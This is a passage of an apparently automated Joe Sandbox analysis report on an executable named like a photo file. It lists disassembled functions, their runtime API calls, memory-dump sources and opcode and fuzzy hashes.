                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0247A58F,00000001,00000000,00000000,?,?,?,?,0247A58F,00000000), ref: 024842EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: 2b798960aa0518b9e9650d8293bfff51d3f24df1ce2de822cf91c4192859ed5b
                                                                • Instruction ID: 182fd13c230beb47d50bacff1165742b78a56464f261b503c098007c02c9fbe9
                                                                • Opcode Fuzzy Hash: 2b798960aa0518b9e9650d8293bfff51d3f24df1ce2de822cf91c4192859ed5b
                                                                • Instruction Fuzzy Hash: 6931F331A28257EFDB20EFA4C880EBE3BB5BF01354F04856AE4609F290D330D951DB52
                                                                Function 100141E5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10014219
                                                                • __isleadbyte_l.LIBCMT ref: 1001424C
                                                                • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,100013C8,?,grams), ref: 1001427D
                                                                • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,100013C8,?,grams), ref: 100142EB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: bc94407fe1439aa9c7a25f31d5a8b100b8e9d1f9aaab61b11d32388322a0d67b
                                                                • Instruction ID: 9a2e08e8898311d7942999ee4248f65e9f85b56d768c46727ef472f1acbeff64
                                                                • Opcode Fuzzy Hash: bc94407fe1439aa9c7a25f31d5a8b100b8e9d1f9aaab61b11d32388322a0d67b
                                                                • Instruction Fuzzy Hash: 0C318931A00296EFDB10DFA4C884AAE7BF5FF05251B5685A9F4649F1A1EB30D9C0DB50
                                                                Function 00485290 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0048535A
                                                                • __CxxThrowException@8.LIBCMT ref: 0048536F
                                                                • std::exception::exception.LIBCMT ref: 0048537E
                                                                • __CxxThrowException@8.LIBCMT ref: 00485393
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                • String ID:
                                                                • API String ID: 2621100827-0
                                                                • Opcode ID: c80c4115f75191134ce878995982e85eb86da5e7660bf1f43fb591c0d9a875b6
                                                                • Instruction ID: 0c1b2fe297d100c01a0242a89e4dbda43fb3c0977573ea152bd88bc8cd55f3ab
                                                                • Opcode Fuzzy Hash: c80c4115f75191134ce878995982e85eb86da5e7660bf1f43fb591c0d9a875b6
                                                                • Instruction Fuzzy Hash: 463168B1900B05AFC714DFAAC881A9AFBF4FF09700B50893FE55A97750D775A908CB54
                                                                Function 0048985C Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ____lc_handle_func.LIBCMT ref: 0048986C
                                                                  • Part of subcall function 0049402D: __getptd.LIBCMT ref: 0049402D
                                                                • ____lc_codepage_func.LIBCMT ref: 00489877
                                                                  • Part of subcall function 00494007: __getptd.LIBCMT ref: 00494007
                                                                • ___pctype_func.LIBCMT ref: 004898DC
                                                                • ___crtLCMapStringA.LIBCMT ref: 00489942
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                                                • String ID:
                                                                • API String ID: 3477544643-0
                                                                • Opcode ID: 5fa6c1e9c05f9c70ff49f9652690f73e3e7f45189eb87fd7e5f18b4eb7e61233
                                                                • Instruction ID: 828dc7b77630b1b5d88d2dfdbc88394a39d614515e2a960c0efeaa3c859500d7
                                                                • Opcode Fuzzy Hash: 5fa6c1e9c05f9c70ff49f9652690f73e3e7f45189eb87fd7e5f18b4eb7e61233
                                                                • Instruction Fuzzy Hash: 6D31E772904645ABDF21AF99C881BBE7BA4AF11304F1C885FF8959B382D238DE40CB55
                                                                Function 0046A0F0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNEL32(?,3D09168B,0045C98E), ref: 0046A146
                                                                • CloseHandle.KERNEL32(?), ref: 0046A14F
                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0046A15E
                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0046A164
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CloseCriticalDeleteHandleSection
                                                                • String ID:
                                                                • API String ID: 1370521891-0
                                                                • Opcode ID: 90e10bcc000f1517c6f3e2f7745fe48d5b4cfb3ee16a5d840ff47fc5c5523f86
                                                                • Instruction ID: 6790b533029cec5fac96aedee5c54d861911c20f1deb2c7fa79e10ab9fd6fda4
                                                                • Opcode Fuzzy Hash: 90e10bcc000f1517c6f3e2f7745fe48d5b4cfb3ee16a5d840ff47fc5c5523f86
                                                                • Instruction Fuzzy Hash: DE218EB19006489BDB10EFA9D84169FFBF8EF94304F11091EE456A7200E779B614CBA6
                                                                Function 00403473 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004AAFEB: EnterCriticalSection.KERNEL32(0062FD00,00000000,00000000,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AAFF8
                                                                  • Part of subcall function 004AAFEB: LeaveCriticalSection.KERNEL32(0062FD00,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AB014
                                                                • FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004034AA
                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,0040354D,?,?,00000044,004011FD), ref: 004034B8
                                                                • LockResource.KERNEL32(00000000,?,?,0040354D,?,?,00000044,004011FD), ref: 004034C7
                                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,0040354D,?,?,00000044,004011FD), ref: 004034D5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
                                                                • String ID:
                                                                • API String ID: 529824247-0
                                                                • Opcode ID: 7d05c3f4721e20ecb6fe7a243619f002cfebfc6dbc67e9dd42b5d14faca3939a
                                                                • Instruction ID: ae931ea26f59ff51bfa14d86516bd3bbabaeed1b018cfe7e8ecaec5f6f46f64e
                                                                • Opcode Fuzzy Hash: 7d05c3f4721e20ecb6fe7a243619f002cfebfc6dbc67e9dd42b5d14faca3939a
                                                                • Instruction Fuzzy Hash: 0C11E6316101256BCB326F298C4567B7DECEB91B9A700053BFC42F7380E678CE0191A4
                                                                Function 00480D40 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_malloc_memmovestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3703101265-0
                                                                • Opcode ID: 879e53258c57736afeebe7e6668e0fab1bd9928571a1a83033bf4f265b2a7a04
                                                                • Instruction ID: 204a02bda50ee349342bac4aa54ef544c342a081f976b55c1a264449fb804502
                                                                • Opcode Fuzzy Hash: 879e53258c57736afeebe7e6668e0fab1bd9928571a1a83033bf4f265b2a7a04
                                                                • Instruction Fuzzy Hash: 73119D71900219AFCB10EF58C8458EEBBF8FF89354B04855AEC489B301E675AA18CBE5
                                                                Function 00415F2F Relevance: 6.1, APIs: 4, Instructions: 55COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_free_wcsncpy
                                                                • String ID:
                                                                • API String ID: 3312590453-0
                                                                • Opcode ID: 9a7e537ab291b7a6aada840bdeb6455b9b5bf3924ab2374c450fcb14438969c9
                                                                • Instruction ID: f815938b9da1b56a6b27316879aaa64c42e2f9360601752fccc8f4641f19d4cf
                                                                • Opcode Fuzzy Hash: 9a7e537ab291b7a6aada840bdeb6455b9b5bf3924ab2374c450fcb14438969c9
                                                                • Instruction Fuzzy Hash: 6D115271104A05DFDB20AF65D881AEAB7E9FF50348B60482FF4C886151E7B999D5CB48
                                                                Function 0041A641 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClipBox.GDI32(?,00000000), ref: 0041A671
                                                                • CreateRectRgnIndirect.GDI32(00000000), ref: 0041A681
                                                                • CreateRectRgnIndirect.GDI32(?), ref: 0041A68A
                                                                • ExtSelectClipRgn.GDI32(?,00000000,00000001), ref: 0041A696
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ClipCreateIndirectRect$Select
                                                                • String ID:
                                                                • API String ID: 4223180713-0
                                                                • Opcode ID: deaec466305661f3873c802bb2af891eb1eb9b20c66ba1216251b0b0f819bff9
                                                                • Instruction ID: 1b0b07805dc4f123803b079dd229d5e621e64d71ba7051fae4b352a9af0af85e
                                                                • Opcode Fuzzy Hash: deaec466305661f3873c802bb2af891eb1eb9b20c66ba1216251b0b0f819bff9
                                                                • Instruction Fuzzy Hash: 62011772D00618ABCB01DFA8D8449DFBBB9BF09314F004426ED01FB210D6B5AA098BA1
                                                                Function 00450390 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00634D8C,3D09168B,00000000,?,00000000,005997A6,000000FF,?,00402D37,00000000,00401336), ref: 004503D3
                                                                • EnterCriticalSection.KERNEL32(00634D8C,3D09168B,00000000,?,00000000,005997A6,000000FF,?,00402D37,00000000,00401336), ref: 004503F2
                                                                • DestroyWindow.USER32(00000000,?,00000000,005997A6,000000FF,?,00402D37,00000000,00401336), ref: 0045043F
                                                                • LeaveCriticalSection.KERNEL32(00634D8C,?,00000000,005997A6,000000FF,?,00402D37,00000000,00401336), ref: 00450450
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DestroyEnterInitializeLeaveWindow
                                                                • String ID:
                                                                • API String ID: 1062774736-0
                                                                • Opcode ID: 1f050d1b4960209b7ec2fcfb29c299bd014478e4b37f85109e7051145d75abb4
                                                                • Instruction ID: 07bdf943eae1a15774ca7839f54620b7861ac7cc318ac282ee15dd2ba669d138
                                                                • Opcode Fuzzy Hash: 1f050d1b4960209b7ec2fcfb29c299bd014478e4b37f85109e7051145d75abb4
                                                                • Instruction Fuzzy Hash: 0611C171A44244EFD700ABD0EE4AB6ABFB9FF11718F00155AEC0242291DBB96508CBE2
                                                                Function 00480F00 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_malloc_memmovestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3703101265-0
                                                                • Opcode ID: c5e365bc32e4e147a237c2aa3958ffdb81f693c8584bd9d0c38f1469bdfd893b
                                                                • Instruction ID: 1f829b9362f67280c70a1f6cfa2319a0111f2911c954f3f5a0ef90e47af7a130
                                                                • Opcode Fuzzy Hash: c5e365bc32e4e147a237c2aa3958ffdb81f693c8584bd9d0c38f1469bdfd893b
                                                                • Instruction Fuzzy Hash: 8401D6729002046BC701EF59D885ADFBBE8DF55344F04C55EF94987201EBB99648C7A5
                                                                Function 02481A25 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                • Instruction ID: b17f53fd5eaff29a4e0765fe3b11e49fa4ccb3518dc3f440c9de62dba97f5482
                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                • Instruction Fuzzy Hash: 8711693245014ABBCF126E85CC018EE3F22BF19255B198516FA6C58130C332C5B2AB91
                                                                Function 10011A21 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                • Instruction ID: b2deb5109e3459db6c2e92c86942fb6d1a7187026451c9960ed85992b78a3838
                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                • Instruction Fuzzy Hash: 0711523640514EBBCF569E84DC41CEE3F62FF08294B558515FE2959031C737DAB2AB82
                                                                Function 00480C00 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_malloc_memmovestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3703101265-0
                                                                • Opcode ID: f59710ccd44d494c6e3061a8ec2ff61b526064ffaa5f7f94af53b445760d1d11
